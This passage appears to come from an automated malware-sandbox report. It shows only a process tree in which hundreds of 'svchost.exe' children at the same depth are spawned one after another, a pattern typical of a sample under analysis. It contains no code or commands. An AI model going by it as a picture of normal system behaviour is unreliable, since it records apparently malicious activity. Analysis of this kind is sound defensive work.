        8⤵
        
        PID:3524
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3548
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3556
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3564
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3572
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3588
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3596
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3612
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3620
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3628
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3636
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3644
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3660
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3668
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3676
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3684
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3692
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3700
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3708
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3716
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3724
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3732
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3740
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3748
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3764
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3772
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3780
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3796
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3804
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3812
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3820
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3828
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3836
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3844
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3852
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3868
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3884
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3892
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3900
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3908
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3916
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3932
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3940
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3948
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3956
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3964
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3972
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3980
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3988
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:3996
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4004
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4012
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4020
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4036
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4044
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4052
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4060
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4068
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4092
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4104
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4112
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4120
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4128
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4136
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4144
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4152
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4160
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4168
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4176
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4184
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4192
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4200
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4208
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4216
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4224
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4232
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4240
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4248
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4256
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4264
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4272
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4280
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4296
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4304
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4312
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4320
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4328
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4344
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4352
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4360
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4368
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4376
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4384
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4392
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4400
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4416
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4424
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4432
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4440
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4448
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4456
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4472
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4480
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4496
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4504
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4512
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4520
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4528
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4544
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4552
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4560
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4568
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4576
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4584
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4592
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4608
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4616
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4624
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4640
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4648
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4656
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4664
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4672
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4688
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4704
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4712
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4720
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4736
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4744
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4768
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4776
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4784
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4792
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4800
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4808
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4824
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4840
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4848
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4856
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4864
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4872
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4880
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4888
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4896
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4904
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4912
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4928
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4944
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4968
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4984
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5000
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5016
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5024
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5040
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5048
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5064
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5072
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5112
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:2188
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1516
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:1692
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5136
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5144
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5152
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5160
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5184
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5200
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5208
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5240
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5256
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5264
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5280
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5288
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5296
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5304
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5312
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5320
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5344
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5360
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5372
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5380
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5388
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5396
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5404
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:5412
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
